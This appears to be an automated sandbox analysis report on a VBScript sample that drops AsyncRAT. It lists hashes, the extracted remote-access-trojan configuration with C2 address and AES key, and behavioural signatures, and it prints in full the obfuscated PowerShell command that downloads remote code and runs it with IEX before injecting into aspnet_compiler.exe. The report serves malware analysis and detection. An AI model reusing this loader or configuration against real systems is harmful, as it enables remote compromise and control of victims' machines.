Analysis
-
max time kernel
147s -
max time network
159s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
21-07-2021 09:00
Static task
static1
Behavioral task
behavioral1
Sample
15.vbs
Resource
win7v20210410
General
-
Target
15.vbs
-
Size
1KB
-
MD5
3e46e05d321065ab67c8b5d588ffe418
-
SHA1
16bbaae13819f996be9f81794df7c9f33ade9b7d
-
SHA256
15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1
-
SHA512
c40d1599d412c9f0fdf8ec5e32916bd1ad3b25f189a61822a602bb675f664fcb683f52efc43e48ded468f79ccea77bca860b63375554ebae99cfffba211e1d59
Malware Config
Extracted
https://ia601405.us.archive.org/30/items/all-2542/ALL_2542.txt
Extracted
asyncrat
0.5.7B
185.19.85.168:8888
AsyncMutex_6SI8OkPnk
-
aes_key
iaCQxXrg9VcwzLPunOt4DDhIibhcZSWL
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
185.19.85.168
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
8888
-
version
0.5.7B
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3844-142-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/3844-143-0x000000000040C71E-mapping.dmp asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 10 1540 powershell.exe 18 1540 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1540 set thread context of 3844 1540 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1540 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2184 wrote to memory of 1540 2184 WScript.exe powershell.exe PID 2184 wrote to memory of 1540 2184 WScript.exe powershell.exe PID 1540 wrote to memory of 3844 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 3844 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 3844 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 3844 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 3844 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 3844 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 3844 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 3844 1540 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601405.us.archive.org/30/items/all-2542/ALL_2542.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFDGTFHJVBNBHGHCCGHJVBKNLJKHJHKLHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('DGTFHJVBNBHGHCCGHJVBKNLJKHJHKLHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1540-114-0x0000000000000000-mapping.dmp
-
memory/1540-120-0x0000027D7B780000-0x0000027D7B781000-memory.dmpFilesize
4KB
-
memory/1540-123-0x0000027D7C620000-0x0000027D7C621000-memory.dmpFilesize
4KB
-
memory/1540-129-0x0000027D79D63000-0x0000027D79D65000-memory.dmpFilesize
8KB
-
memory/1540-128-0x0000027D79D60000-0x0000027D79D62000-memory.dmpFilesize
8KB
-
memory/1540-130-0x0000027D79D66000-0x0000027D79D68000-memory.dmpFilesize
8KB
-
memory/1540-141-0x0000027D7B800000-0x0000027D7B80E000-memory.dmpFilesize
56KB
-
memory/3844-142-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/3844-143-0x000000000040C71E-mapping.dmp
-
memory/3844-149-0x00000000056D0000-0x00000000056D1000-memory.dmpFilesize
4KB